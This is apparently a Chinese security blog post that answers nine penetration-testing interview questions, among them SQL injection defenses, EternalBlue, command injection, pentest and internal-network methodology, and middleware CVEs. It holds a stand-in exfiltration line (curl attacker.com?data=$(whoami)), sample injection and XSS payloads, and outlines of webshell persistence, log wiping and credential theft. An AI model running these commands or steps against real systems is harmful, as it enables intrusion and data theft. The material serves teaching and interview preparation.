安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
1、SQL注入的防护方法有哪些? 2、永恒之蓝的漏洞原理是什么?怎么做到的? 3、命令注入有哪些? 4、给你一个目标网站,你该如何进行测试? 5、给你一个后台登陆地点的网站,你能从中发现那些问题? 6、给你一千台服务器和交换机,你会如何进行扫描? 7、内网渗透了解多少? 8、中间件有哪些? 9、中间件有哪些已知的漏洞?
1. SQL注入防护方法
核心原则:数据与代码分离
- 参数化查询(Prepared Statements)
使用占位符(如?
或@param
)替代拼接SQL,数据库区分指令与数据(如Java的PreparedStatement
、Python的cursor.execute()
)。- 输入过滤与白名单校验
对用户输入进行类型/长度约束(如仅允许邮箱格式),禁用高危字符('
、;
、--
)。- 最小权限原则
数据库账户仅赋予必要权限(禁用DROP
、FILE
等)。- ORM框架使用
Hibernate、Entity Framework等自动转义输入。- Web应用防火墙(WAF)
部署ModSecurity等规则引擎拦截注入特征(如UNION SELECT
)。- 错误信息屏蔽
避免数据库报错信息直接返回前端。
2. 永恒之蓝(EternalBlue)漏洞原理
CVE编号:CVE-2017-0144
漏洞根源:SMBv1协议处理SMBv1 Trans2
请求的缓冲区溢出漏洞。
攻击流程:
- 畸形数据包触发溢出
攻击者发送特制的SMB_COM_TRANSACTION2
请求,覆盖内核内存。- 内核权限执行Shellcode
利用溢出覆盖函数指针,执行攻击者代码(如NSA开发的DoublePulsar后门)。- 横向传播
通过SMB协议在内网自动扩散(如WannaCry勒索病毒)。
修复方案:
禁用SMBv1,安装MS17-010补丁,关闭445端口。
3. 命令注入类型与案例
分类方式:
- 直接命令注入
用户输入直接拼接至系统命令(如os.system("ping " + user_input)
),可通过;
、&
、|
执行多条命令。- 间接注入(如环境变量污染)
篡改PATH
或LD_PRELOAD
劫持动态链接库。- 盲注(无回显)
通过时间延迟(sleep 5
)或DNS外带数据(curl attacker.com?data=$(whoami)
)判断结果。
高危函数:
PHP的system()
/exec()
、Python的os.popen()
、Node.js 的child_process.exec()
。
4. 目标网站渗透测试流程
分阶段方法论:
阶段 关键操作 信息收集 WHOIS查询、子域名爆破(Amass)、端口扫描(Nmap)、框架指纹识别(Wappalyzer) 漏洞扫描 自动化工具(Burp Suite、Nessus) + 手动验证(如修改参数、边界值测试) 漏洞利用 SQL注入工具(sqlmap)、XSS载荷测试、文件上传绕过(Content-Type欺骗) 权限提升 利用系统/服务漏洞提权(如Dirty Pipe)、数据库弱口令爆破 权限维持 植入Webshell(蚁剑/冰蝎)、创建隐藏账户、SSH密钥后门 内网横向移动 ARP欺骗、Pass-the-Hash攻击、域渗透(BloodHound分析) 痕迹清理 删除日志( /var/log/
)、隐藏进程(rootkit)
5. 后台登录点安全审计要点
- 认证机制缺陷
- 弱口令(admin/admin123)
- 无验证码或验证码可绕过(OCR识别、重复使用)
- 未限制登录尝试频率(爆破漏洞)
- 传输与存储风险
- HTTP明文传输密码(应强制HTTPS)
- Cookie未设置
HttpOnly
(XSS窃取会话)- 逻辑漏洞
- 响应差异暴露用户存在性(枚举用户名)
- 密码重置功能缺陷(Token未绑定用户、可预测Token)
- 注入漏洞
- SQL注入(
' OR 1=1 --
)- XSS注入(登录表单插入
<script>alert(1)</script>
)
6. 千台服务器/交换机扫描策略
分布式架构设计:
mermai
graph LR A[控制节点] --> B[任务队列 Kafka/RabbitMQ] B --> C[扫描节点1-N] C --> D[结果存储 ES]
关键技术点:
- IP分段与负载均衡
使用nmap -sS -iL targets.txt -oA scan --max-rate 1000
分批次扫描,避免流量洪峰。- 指纹识别优化
并行化服务识别(-sV
)与OS探测(-O
)。- 交换机特殊处理
SNMP扫描(snmpwalk
)、ARP扫描(netdiscover
),避开ICMP限制。- 结果聚合
通过Elasticsearch + Kibana可视化漏洞分布。
7. 内网渗透核心技术
攻击链关键步骤:
- 信息收集
ARP扫描、NetBIOS枚举、域控制器定位(nltest /dclist
)。- 权限提升
本地提权(CVE-2021-4034)、凭证窃取(Mimikatz抓取LSASS内存)。- 横向移动
- 协议利用:SMB爆破(CrackMapExec)、WinRM远程执行
- 中间人攻击:LLMNR/NBT-NS投毒(Responder)
- 域渗透:黄金票据伪造、DCSync攻击获取域控权限
- 数据窃取与持久化
隐蔽隧道(DNS/ICMP)、GPO组策略后门。
8. 常见中间件列表
类型 代表产品 Web服务器 Apache、Nginx、IIS 应用服务器 Tomcat、WebLogic、JBoss/WildFly 反向代理 Traefik、HAProxy 消息队列 RabbitMQ、Kafka、ActiveMQ API网关 Kong、Tyk
9. 中间件经典漏洞案例
中间件 漏洞 影响 Apache CVE-2021-41773(路径遍历) 读取服务器敏感文件 Nginx CVE-2013-2028(栈溢出) 远程代码执行(RCE) Tomcat CVE-2020-1938(Ghostcat) AJP协议文件读取/RCE WebLogic CVE-2020-14882(未授权命令执行) 控制服务器 JBoss JMXInvokerServlet 反序列化 远程代码执行